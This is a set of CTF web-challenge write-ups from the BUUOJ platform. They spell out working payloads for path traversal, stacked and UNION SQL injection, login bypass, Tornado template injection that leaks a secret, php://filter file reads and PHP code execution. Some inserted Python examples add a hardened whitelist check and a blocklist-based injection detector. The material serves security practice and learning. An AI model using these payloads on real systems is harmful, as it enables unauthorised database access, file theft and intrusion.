[HCTF 2018]WarmUp
The page opens with a single image. Viewing the source reveals a hint pointing to source.php, so let's look at it directly:
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        // exact match against the whitelist
        if (in_array($page, $whitelist)) {
            return true;
        }

        // only the part before the first '?' is checked
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        // the same prefix check again, after one round of URL decoding
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

// include receives the complete value of file, not the checked prefix
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
The source mentions hint.php, which says: flag not here, and flag in ffffllllaaaagggg
Knowing the location, we need a way past the check so the file gets read, hence:
http://44a1c579-f956-49c8-a208-dda1ea28fe38.node3.buuoj.cn/source.php?file=source.php?/../../../../ffffllllaaaagggg
checkFile only compares the text before the first ?, which is source.php and therefore whitelisted, while include receives the whole string. source.php? is treated as a directory, each ../ climbs one level up, and the ? is what truncates the check.
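Added example (a Python port, not the challenge's own code): the prefix check from checkFile next to a hardened version that compares the whole decoded value, plus a lexical path normalisation showing where the page's payload lands. The names WHITELIST, vulnerable_check, hardened_check, resolved_include_path and the webroot /var/www/html are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed port of emmm::checkFile() from the source above (assumed names).
WHITELIST = {"source.php", "hint.php"}

def vulnerable_check(page: str) -> bool:
    """Mirrors checkFile: only the text before the first '?' is compared,
    first on the raw value and then again after one round of URL decoding."""
    if page in WHITELIST:
        return True
    if page.split("?", 1)[0] in WHITELIST:      # mb_substr up to the first '?'
        return True
    decoded = unquote(page)                      # urldecode() pass
    return decoded.split("?", 1)[0] in WHITELIST

def hardened_check(page: str) -> bool:
    """Compare the complete decoded value against the whitelist, never a prefix."""
    return unquote(page) in WHITELIST

def resolved_include_path(webroot: str, page: str) -> str:
    """Lexically collapse '..' the way an include path resolves, so the
    nonexistent 'source.php?' segment is simply stepped out of."""
    return posixpath.normpath(posixpath.join(webroot, page))

if __name__ == "__main__":
    payload = "source.php?/../../../../ffffllllaaaagggg"
    print(vulnerable_check(payload), hardened_check(payload))
    print(resolved_include_path("/var/www/html", payload))
```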
[强网杯 2019]随便注
Submitting some arbitrary input reveals the following filter:
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
select is banned, but in MySQL we can still read rows with the HANDLER statement. show and use are not banned either.
Stacked queries are also possible.
So the payload is straightforward.
First, get the database names:
1';SHOW DATABASES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BSHOW+DATABASES%3B--%2B
Then use stacking to list the tables:
1';USE ctftraining;SHOW TABLES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BUSE+ctftraining%3BSHOW+TABLES%3B--%2B
array(1) {
[0]=>
string(10) "FLAG_TABLE"
}
array(1) {
[0]=>
string(4) "news"
}
array(1) {
[0]=>
string(5) "users"
}
1';USE supersqli;SHOW TABLES;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27%3BUSE+supersqli%3BSHOW+TABLES%3B--%2B
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
Now let's look at the contents:
1';USE supersqli;HANDLER `1919810931114514` OPEN AS a;HANDLER a READ FIRST;HANDLER a CLOSE;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1%27;USE%20supersqli;HANDLER%20`1919810931114514`%20OPEN%20AS%20a;HANDLER%20a%20READ%20FIRST;HANDLER%20a%20CLOSE;--+
array(1) {
[0]=>
string(42) "flag{b3c9350f-3de0-4576-a91e-352079c88d39}"
}
Got the flag.
As a bonus, an Easter egg:
1';USE ctftraining;HANDLER news OPEN AS a;HANDLER a READ FIRST;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a CLOSE;--+
http://61e566e2-f2ef-4e80-98ff-e90c3ce89536.node3.buuoj.cn/?inject=1';USE ctftraining;HANDLER news OPEN AS a;HANDLER a READ FIRST;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a READ NEXT;HANDLER a CLOSE;--+
array(4) {
[0]=>
string(1) "1"
[1]=>
string(3) "dog"
[2]=>
string(282) "The domestic dog (Canis lupus familiaris when considered a subspecies of the wolf or Canis familiaris when considered a distinct species)[4] is a member of the genus Canis (canines), which forms part of the wolf-like canids,[5] and is the most widely abundant terrestrial carnivore."
[3]=>
string(10) "1571838684"
}
array(4) {
[0]=>
string(1) "2"
[1]=>
string(3) "cat"
[2]=>
string(241) "The cat or domestic cat (Felis catus) is a small carnivorous mammal.[1][2] It is the only domesticated species in the family Felidae.[4] The cat is either a house cat, kept as a pet, or a feral cat, freely ranging and avoiding human contact."
[3]=>
string(10) "1571838684"
}
array(4) {
[0]=>
string(1) "3"
[1]=>
string(4) "bird"
[2]=>
string(235) "Birds, also known as Aves, are a group of endothermic vertebrates, characterised by feathers, toothless beaked jaws, the laying of hard-shelled eggs, a high metabolic rate, a four-chambered heart, and a strong yet lightweight skeleton."
[3]=>
string(10) "1571838684"
}
array(4) {
[0]=>
string(1) "4"
[1]=>
string(4) "flag"
[2]=>
string(37) "Flag is in the database but not here."
[3]=>
string(10) "1571838684"
}
[SUCTF 2019]EasySQL
This challenge is said to have had its source available during the competition, so I found the source online and worked from that.
There are two payloads here.
First:
*,1
This selects everything directly.
Second:
1;set sql_mode=PIPES_AS_CONCAT;select 1
Switching MySQL's || operator from logical OR to string concatenation makes the query return the flag.
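Added detection example, not part of this writeup, covering both the 随便注 filter above and the stacked set sql_mode trick from EasySQL: the page's own preg_match blocklist is ported to Python and run beside a simple stacked-statement rule over constructed access-log lines modelled on the requests shown. The STACKED rule, the log lines and every function name are assumptions.

```python
import re
from urllib.parse import urlparse, unquote_plus

# Python port of the page's filter: preg_match("/select|update|delete|drop|insert|where|\./i", $inject)
BLOCKLIST = re.compile(r"select|update|delete|drop|insert|where|\.", re.I)

# Assumed detection rule: a statement terminator followed by another statement
# keyword signals stacking; HANDLER/SHOW/USE/SET sql_mode are not in the blocklist.
STACKED = re.compile(r";\s*(?:handler|show|use|set\s+sql_mode|select)\b", re.I)

def blocklist_rejects(inject: str) -> bool:
    return BLOCKLIST.search(inject) is not None

def looks_stacked(inject: str) -> bool:
    return STACKED.search(inject) is not None

def query_param(path: str, name: str) -> str:
    """Decode one query-string parameter; splits on '&' only, so ';' survives."""
    for pair in urlparse(path).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return ""

def triage(log_line: str) -> dict:
    """Extract inject= from a combined-format request line and classify it."""
    path = log_line.split('"')[1].split()[1]          # "GET /?inject=... HTTP/1.1"
    inject = query_param(path, "inject")
    return {"inject": inject, "blocked": blocklist_rejects(inject),
            "stacked": looks_stacked(inject)}

# Constructed log lines (not real traffic), modelled on the writeup's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Oct/2019:10:00:01 +0000] "GET /?inject=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Oct/2019:10:00:02 +0000] "GET /?inject=1%27%3BSHOW+DATABASES%3B--%2B HTTP/1.1" 200 640',
    '10.0.0.5 - - [20/Oct/2019:10:00:03 +0000] "GET /?inject=1%27;USE%20supersqli;HANDLER%20%601919810931114514%60%20OPEN%20AS%20a;HANDLER%20a%20READ%20FIRST;HANDLER%20a%20CLOSE;--+ HTTP/1.1" 200 700',
    '10.0.0.5 - - [20/Oct/2019:10:00:04 +0000] "GET /?inject=1;set+sql_mode%3DPIPES_AS_CONCAT;select+1 HTTP/1.1" 200 300',
    '10.0.0.5 - - [20/Oct/2019:10:00:05 +0000] "GET /?inject=1%27+union+select+1,2--+ HTTP/1.1" 200 128',
]

def flagged(lines):
    """Requests that the blocklist let through but the stacking rule catches."""
    return [t["inject"] for t in map(triage, lines) if t["stacked"] and not t["blocked"]]

if __name__ == "__main__":
    for item in flagged(SAMPLE_LOG):
        print("stacked statement passed the filter:", item)
```

The fourth line is caught by the blocklist's select only because it is the page's EasySQL payload; the first three show why a keyword blocklist is not a substitute for parameterised queries.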
[极客大挑战 2019]EasySQL
Payload:
/check.php?username=1'OR'1'='1&password=1'OR'1'='1
A universal password does the job: it closes the quote on the left and reopens it on the right, so the condition is always true and we get the flag.
[极客大挑战 2019]Havefun
A cat. Press F12 to see the source:
$cat = $_GET['cat'];
echo $cat;
if ($cat == 'dog') {
    echo 'Syc{cat_cat_cat_cat}';
}
So let's try it:
http://4875f557-8a5e-4290-85cf-419fe3fe927d.node3.buuoj.cn/?cat=dog
Got the flag.
[护网杯 2018]easy_tornado
Three files, with their contents:
/flag.txt: flag in /fllllllllllllag
/welcome.txt: render
/hints.txt: md5(cookie_secret+md5(filename))
This hints that we need to perform a file read.
Note that at this point the address bar looks roughly like this:
http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/file?filename=/flag.txt&filehash=462ba60d88adff345e29fb730bb00dad
In plain terms, we need to construct a filehash, but we don't know cookie_secret, which is probably a fairly long string.
A quick Baidu search showed that it can be leaked through a template-injection-like technique.
So, first:
http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/error?msg={{handler.settings}}
This gives us cookie_secret:
{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'bb610769-839d-4594-a36b-4522701241bb'}
Then compute the md5:
import hashlib

cv = 'bb610769-839d-4594-a36b-4522701241bb'  # cookie_secret leaked above

def md5(s):
    return hashlib.md5(s.encode('UTF-8')).hexdigest()

# filehash = md5(cookie_secret + md5(filename)), as hints.txt describes
print(md5(cv + md5('/fllllllllllllag')))
Visiting the resulting URL gives the flag:
http://00fb5853-9d87-4571-aa30-10f71787f268.node3.buuoj.cn/file?filename=/fllllllllllllag&filehash=9b6438bb1920a3e20cc59e93c0224478
[极客大挑战 2019]Secret File
F12 gives Archive_room.php.
Following it, we find that the redirect has to be caught with Burp Suite; intercepting it gives secr3t.php.
Its source is:
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = $_GET['file'];
if (strstr($file, "../") || stristr($file, "tp") || stristr($file, "input") || stristr($file, "data")) {
    echo "Oh no!";
    exit();
}
include($file);
// the flag is in flag.php
?>
</html>
This calls for some kind of file inclusion.
Using a PHP stream wrapper:
http://cdc9247f-dae2-47bd-99f6-d34b5ceb40b0.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
Base64-decoding the response:
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
    <h1 style="font-family:verdana;color:red;text-align:center;">哈哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
    <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
    <?php
    echo "我就在这里";
    $flag = 'flag{961d16f2-65b1-47d7-9ca5-13c46b17ae03}';
    $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
    ?>
    </p>
</body>
</html>
Got the flag.
[ACTF2020 新生赛]Include
Read the source through a PHP stream wrapper.
Payload:
http://eafba8d5-8d65-4aea-a535-21e1406b0db5.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]LoveSQL
Try an injection:
http://12941d71-aa31-4e54-9151-a28205ddac5e.node3.buuoj.cn/check.php?username=flag&password=mi' UNION SELECT '1','2','3
The values are echoed back normally.
So we keep injecting. Table names:
password=mi' UNION SELECT '1',group_concat('',table_name),'3' FROM information_schema.tables WHERE table_schema='geek' UNION SELECT 1,1,'2
Column names:
password=mi' UNION SELECT '1',group_concat('',column_name),'3' FROM information_schema.columns WHERE table_name='l0ve1ysq1' UNION SELECT 1,1,'2
Rows:
password=mi' UNION SELECT '1',group_concat('',username),'3' FROM l0ve1ysq1 UNION SELECT 1,1,'2
Contents:
password=mi' UNION SELECT '1',group_concat('',password),'3' FROM l0ve1ysq1 WHERE username='flag' UNION SELECT 1,1,'2
[RoarCTF 2019]Easy Calc
At first I tried to build INF and NAN to get PHP injection... but that doesn't work; nothing executes.
Searching online writeups revealed that the trick is a space in front of the parameter name.
Get the file names:
calc.php? num=1;var_dump(scandir(chr(47)))
Get the flag:
calc.php? num=1;var_dump(file_get_contents(CHR(47).CHR(102).CHR(49).CHR(97).CHR(103).CHR(103)))